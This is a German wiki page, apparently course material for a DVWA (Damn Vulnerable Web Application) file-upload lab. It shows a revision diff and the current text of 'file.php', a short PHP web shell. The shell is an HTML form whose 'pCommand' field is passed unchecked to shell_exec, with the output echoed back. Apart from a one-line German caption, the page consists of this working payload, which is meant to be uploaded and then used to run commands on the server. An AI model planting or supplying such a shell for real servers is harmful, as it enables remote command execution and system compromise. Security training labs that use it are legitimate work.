DVWA File Upload Komando Ausführung: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Markierung: Ersetzt
Zeile 1: Zeile 1:
 
=file.php=
 
=file.php=
 
;Dieser PHP File so später Komandos ausführen
 
;Dieser PHP File so später Komandos ausführen
 +
<pre>
 +
<form action="" method="post" enctype="application/x-www-form-urlencoded">
 +
<table style="margin-left:auto; margin-right:auto;">
 +
<tr>
 +
<td colspan="2" style="text-align:center; font-weight: bold;color: #770000;">
 +
Please enter system command
 +
</td>
 +
</tr>
 +
<tr><td>&nbsp;</td></tr>
 +
<tr>
 +
<td style="font-weight: bold;">Command</td>
 +
<td><input type="text" name="pCommand" size="50"></td>
 +
</tr>
 +
<tr><td>&nbsp;</td></tr>
 +
<tr>
 +
<td colspan="2" style="text-align:center;">
 +
<input type="submit" value="Execute Command" />
 +
</td>
 +
</tr>
 +
</table>
 +
</form>
 +
<?php
 +
if (isset($_REQUEST["pCommand"])) {
 +
echo <nowiki>"<pre>";</nowiki>
 +
echo shell_exec($_REQUEST["pCommand"]);
 +
echo <nowiki>"</pre>";</nowiki>
 +
}//end if
 +
?>
 +
</pre>

Version vom 16. Juni 2021, 18:30 Uhr

file.php

Dieser PHP File so später Komandos ausführen
<form action="" method="post" enctype="application/x-www-form-urlencoded">
	<table style="margin-left:auto; margin-right:auto;">
		<tr>
			<td colspan="2" style="text-align:center; font-weight: bold;color: #770000;">
				Please enter system command
			</td>
		</tr>
		<tr><td> </td></tr>
		<tr>
			<td style="font-weight: bold;">Command</td>
			<td><input type="text" name="pCommand" size="50"></td>
		</tr>
		<tr><td> </td></tr>
		<tr>
			<td colspan="2" style="text-align:center;">
				<input type="submit" value="Execute Command" />
			</td>
		</tr>
	</table>
</form>
<?php 
	if (isset($_REQUEST["pCommand"])) {
		echo "<pre>";
		echo shell_exec($_REQUEST["pCommand"]);
		echo <nowiki>"

";</nowiki>

}//end if ?>

Abgerufen von „http://wiki.ixheim.de/index.php?title=DVWA_File_Upload_Komando_Ausführung&oldid=24210